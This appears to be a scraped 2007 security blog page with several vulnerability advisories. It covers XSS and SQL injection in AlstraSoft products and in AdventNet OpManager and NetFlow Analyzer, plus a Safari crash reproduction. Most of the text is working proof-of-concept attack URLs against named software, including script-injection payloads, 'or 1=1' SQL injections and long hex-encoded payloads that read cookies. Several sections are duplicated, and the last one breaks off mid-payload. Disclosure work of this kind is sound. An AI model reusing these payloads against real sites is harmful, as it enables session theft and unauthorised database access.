####################################################
AlstraSoft Multiple products multiple Vulnerabilities
Vendor urL:http://www.alstrasoft.com/products.htm
Advisore url:http://lostmon.blogspot.com/2007/07/
alstrasoft-multiple-products-multiple.html
Vendor notify:yes (webform) Exploit included: yes
BID:25022, 25023, 25026
####################################################
Multiple products of Alstrasoft Are prone vulnerables
to Cross site scripting and SQL injections style attacks
################
examples
################
For exploit some flaws you need to login
#####################################
AlstraSoft Video Share Enterprise
#####################################
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+
sent+"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&page=10">&viewtype=&category=mr
http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc"><script>alert()</script>
http://[Victim]/videoshare/signup.php?
next=upload"><script>alert()</script>
http://[Victim]/videoshare/search_result.php?
search_id=ghgdgdfd"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=">&category=mr
http://[Victim]/videoshare/video.php?
category=tf"><script>alert()</script>&viewtype=
http://[Victim]/videoshare/video.php?
page=5"><script>alert()</script>
http://[Victim]/videoshare/compose.php?
receiver=demo"><script>alert()</script>
http://[Victim]/videoshare/groups.php?
b=ra&catgy=Recently%20Added"><script>alert()</script>
http://[Victim]/videoshare/siteadmin/
channels.php?a=Search&channelid=&channelname=%22
%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search=Search
http://[Victim]/videoshare/siteadmin/muser.php?
email=sanam11sa@hotmail.com&uname=GLAMOROUS"><script>alert()</script>
path disclosure:
http://[Victim]/videoshare/uprofile.php?
UID=53"><script>alert()</script>
http://[Victim]/videoshare/channel_detail.php?
chid=24"><script>alert()</script>
http://[Victim]/videoshare/uvideos.php?UID=53
"><script>alert()</script>
http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=&category=mr'
http://[Victim]/videoshare/groups_home.php?urlkey=
RSL"><script>alert()</script>
http://[Victim]/videoshare/ufriends.php?UID=253
"><script>alert()</script>
SQL injection :
http://[Victim]/videoshare/gmembers.php?urlkey=gshahzad&gid=9%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1
http://[Victim]/videoshare/ugroups.php?UID=253%20or%201=1
http://[Victim]/videoshare/uprofile.php?UID=253%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=public
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private
http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1
http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1
http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1
http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1
###########################################
AlstraSoft Text Ads Enterprise
###########################################
http://[Victim]/ads/forgot_uid.php?r=1"><script>alert()</script>
http://[Victim]/ads/search_results.php?query="><script>alert()</script>
http://[Victim]/ads/search_results.php?query=lala&sk=AlexaRating"><script>alert()</script>
http://[Victim]/ads/website_page.php?pageId=1004"><script>alert()</script>
#########################################
AlstraSoft SMS Text Messaging Enterprise
########################################
http://[Victim]/admin/membersearch.php?pagina=17&q=
la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
http://[Victim]/admin/edituser.php?userid=
Walltrapas"><script>alert()</script>
http://[Victim]/admin/membersearch.php?
q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit
#################################################
e-friends
http://alstrahost.com/friends/index.php?mode=
people_card&p_id=927"><script>alert()</script>
this is a persistent XSS
########################################
AlstraSoft Affiliate Network Pro
########################################
http://[Victim]/affiliate/merchants/index.php?
Act=programedit&mode=edit&id=42"><script>alert()</script>
http://[Victim]/affiliate/merchants/index.php?Act=
programedit&mode=edit&id=42&msg=Program%20Edited%20Success
fully"><script>alert()</script>
http://[Victim]/affiliate/merchants/index.php?Act=
uploadProducts&pgmid=41%20or%201=1 // SQL And XSS
http://[Victim]/affiliate/merchants/index.php?Act=
daily&d=9&m=07&y=2007 // all variables XSS affected except Act
http://[Victim]/affiliate/merchants/index.php?Act=
ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date
"><script>alert()</script>
http://[Victim]/affiliate/merchants/index.php?Act=
LinkReport&sub=View&i=1&txtto=17/07/2007&txtfrom=12/07/2007
&programs=All // all variables XSS affceted except Act y sub
http://[Victim]/affiliate/merchants/temp.php?rowid=
5"><script>alert()</script> // posible SQL too
http://[Victim]/affiliate/merchants/index.php?Act=
add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script>
&modofpay=Authorize.net&bankname=&bankno=&
bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid=
####################################
AlstraSoft Article Manager Pro
####################################
http://[Victim]/article/contact_author.php?
userid=1%20"><script>alert()</script>
#######################################
AlstraSoft AskMe Pro
#######################################
http://[Victim]/ask/forum_answer.php?que_id=85%20or%201=1 // SQL
http://[Victim]/ask/search.php?cat_id=14-18%20or%201=1 // SQL
http://[Victim]/ask/search.php?status=Pending&cat_id="><script>alert()</script>
http://[Victim]/ask/search.php?status=Pending&cat_id=1%20or%201=1 // SQL
http://[Victim]/ask/register.php?typ=expert"><script>alert()</script>
###################### €nd ########################
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Crashing Safari 3.0.2 for windows Step by Step
Friday, July 13, 2007
Safari for windows 3.0.2 Crash Step by step
http://www.apple.com/safari/download/
The Bug come from activity window wen manage
diferents tab accross the activity window.
I report it to vendor and they working for
debugging this flaw and others (i think).
Version afected:
Safari for windows 3.0.2 (512.13.1)
i don´t know if this issue colud be done
in other versions.
And i don´t know if with this issue a local or
remote user can execute code.
Let´s Go
1 - open a safari window.
2 - open a new tab in the same window (now we are in the second tab)
3 - open Window/activity (we have the two tabs)
4 - click on the first tab in the activity window (safari crashing)
other way :
1 open a safari window ( window 1 )
2 open a new tab in window 1
3 open a new safari window (window 2)
4 open a new tab in window 2 (now we are in the window 2 tab 2)
5 open window/activity (we have the four tabs )
6 doble click in any tab of the window 1 (safari crashing)
I working in a html file to demostrate that this posible vuln can exploit
by a remote user. Any sugention or idea are welcome to Lostmon@gmail.com
Thnx to all !!
Whatch this 'mov' to look the step by step with the video:
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
http://www.apple.com/safari/download/
The Bug come from activity window wen manage
diferents tab accross the activity window.
I report it to vendor and they working for
debugging this flaw and others (i think).
Version afected:
Safari for windows 3.0.2 (512.13.1)
i don´t know if this issue colud be done
in other versions.
And i don´t know if with this issue a local or
remote user can execute code.
Let´s Go
1 - open a safari window.
2 - open a new tab in the same window (now we are in the second tab)
3 - open Window/activity (we have the two tabs)
4 - click on the first tab in the activity window (safari crashing)
other way :
1 open a safari window ( window 1 )
2 open a new tab in window 1
3 open a new safari window (window 2)
4 open a new tab in window 2 (now we are in the window 2 tab 2)
5 open window/activity (we have the four tabs )
6 doble click in any tab of the window 1 (safari crashing)
I working in a html file to demostrate that this posible vuln can exploit
by a remote user. Any sugention or idea are welcome to Lostmon@gmail.com
Thnx to all !!
Whatch this 'mov' to look the step by step with the video:
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
NetFlow Analizer 5 & OpManager 7 multiple XSS
Wednesday, July 04, 2007
###################################################
NetFlow Analizer 5 & OpManager 7 multiple XSS
vendor url:http://www.adventnet.com/
advisore:http://lostmon.blogspot.com/2007/07/
netflow-analizer-5-opmanager-7-multiple.html
vendor notify:yes exploits include:yes
Secunia:SA25947 SA20067,
BID:24767, 24766
SecWatch:SWID1018376, SWID1018377
###################################################
NetFlow Analizer and OpManager contains a flaw that allows
a remote cross site scripting attack. This flaw exists
because the application does not validate multiple params
upon submission to multiple scripts.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.
#####################
Versions afected:
#####################
OpManager 7
OpManager 6
NetFlow Analizer 5
other versions can be vulnerables too
###################
Solution:
###################
No solutions was available at this time !!!
##################
Time Line
##################
Discovered:20-05-2007
vendor notify:02-07-2007
vendor response:-----
disclosure:04-07-2007
###################
Examples
###################
for exploit some flaws you need to login.
#####################
OpManager
#####################
http://localhost:8080/map/ping.do?name=192.168.1.2%22%3E%3C
%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3
D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%
67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57
%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%7
2%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%
73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E
%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E
http://localhost:8080/map/traceRoute.do?name=192.168.1.2%22
%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%
6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E
%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%
3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3
E%3C%2F%62%6F%64%79%3E
http://localhost:8080/devices/Search.do?searchTerm=sss%22%
3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3
C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F
%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3EE&requestid=SNAPSHOT&selected
Tab=Map
http://localhost:8080/reports/ReportViewAction.do?selected
Tab=Reports&selectedNode=Server_Memory_Utilization&reportN
ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E
%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%
6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6
D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20
%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%
57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6
1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69
%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di
splayName=webclient.reports.servers.memutil
http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_Memory_Utilization&reportNam
e=Utilization_Report&displayName=webclient.reports.servers.
memutil%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E
http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_CPU_Utilization%22%3E%3C%62%
6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22
%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%7
3%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%
73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E
%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%6
3%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%
2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62
%6F%64%79%3E&reportName=Utilization_Report&displayName=webc
lient.reports.servers.cpuutil
http://localhost:8080/admin/ServiceConfiguration.do?operati
on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7
0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%
73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E
%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2
1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%
21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72
%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2
F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte
r&serviceName=Alerter
http://localhost:8080/admin/DeviceAssociation.do?selectedNo
de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D
%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3
E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63
%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa
me=com.adventnet.me.opmanager.webclient.admin.association.N
TServiceAssociation
http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E&selectedNode=NTServiceConf
igurations
http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin&selectedNode=NTServiceConfigurations%22%3E%3C%62%6F
%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%6
8%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%
70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73
%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%5
8%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%
72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E
%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6
F%64%79%3E
#######################
NetFlow Analizer
#######################
http://localhost:8080/netflow/jspui/applicationList.jsp?alph
a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68
%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F
%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C
%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70
%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E
%3C%2F%62%6F%64%79%3E
http://localhost:8080/netflow/jspui/appConfig.jsp?task=Modif
y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7
2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6
2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6
E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3
E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6
5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3
C%2F%62%6F%64%79%3E&appID=62
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=
ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%
6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%
6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%
3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%
74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=g
roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%
68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%
6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%
3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%
70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%
6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%
3E%3C%2F%62%6F%64%79%3E&grDisp=1
http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=g
lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%
6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E
http://localhost:8080/netflow/jspui/customReport.jsp?rtype=gl
obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%
72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2
0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%
72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73
%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2
E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%
64%79%3E&period=hourly&customOption=true&firstTime=true
#################### €nd ################################
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
NetFlow Analizer 5 & OpManager 7 multiple XSS
vendor url:http://www.adventnet.com/
advisore:http://lostmon.blogspot.com/2007/07/
netflow-analizer-5-opmanager-7-multiple.html
vendor notify:yes exploits include:yes
Secunia:SA25947 SA20067,
BID:24767, 24766
SecWatch:SWID1018376, SWID1018377
###################################################
NetFlow Analizer and OpManager contains a flaw that allows
a remote cross site scripting attack. This flaw exists
because the application does not validate multiple params
upon submission to multiple scripts.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.
#####################
Versions afected:
#####################
OpManager 7
OpManager 6
NetFlow Analizer 5
other versions can be vulnerables too
###################
Solution:
###################
No solutions was available at this time !!!
##################
Time Line
##################
Discovered:20-05-2007
vendor notify:02-07-2007
vendor response:-----
disclosure:04-07-2007
###################
Examples
###################
for exploit some flaws you need to login.
#####################
OpManager
#####################
http://localhost:8080/map/ping.do?name=192.168.1.2%22%3E%3C
%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3
D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%
67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57
%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%7
2%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%
73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E
%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E
http://localhost:8080/map/traceRoute.do?name=192.168.1.2%22
%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%
6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E
%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%
3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3
E%3C%2F%62%6F%64%79%3E
http://localhost:8080/devices/Search.do?searchTerm=sss%22%
3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3
C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F
%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3EE&requestid=SNAPSHOT&selected
Tab=Map
http://localhost:8080/reports/ReportViewAction.do?selected
Tab=Reports&selectedNode=Server_Memory_Utilization&reportN
ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E
%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%
6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6
D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20
%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%
57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6
1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69
%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di
splayName=webclient.reports.servers.memutil
http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_Memory_Utilization&reportNam
e=Utilization_Report&displayName=webclient.reports.servers.
memutil%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E
http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_CPU_Utilization%22%3E%3C%62%
6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22
%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%7
3%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%
73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E
%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%6
3%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%
2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62
%6F%64%79%3E&reportName=Utilization_Report&displayName=webc
lient.reports.servers.cpuutil
http://localhost:8080/admin/ServiceConfiguration.do?operati
on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7
0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%
73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E
%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2
1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%
21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72
%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2
F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte
r&serviceName=Alerter
http://localhost:8080/admin/DeviceAssociation.do?selectedNo
de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D
%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3
E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63
%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
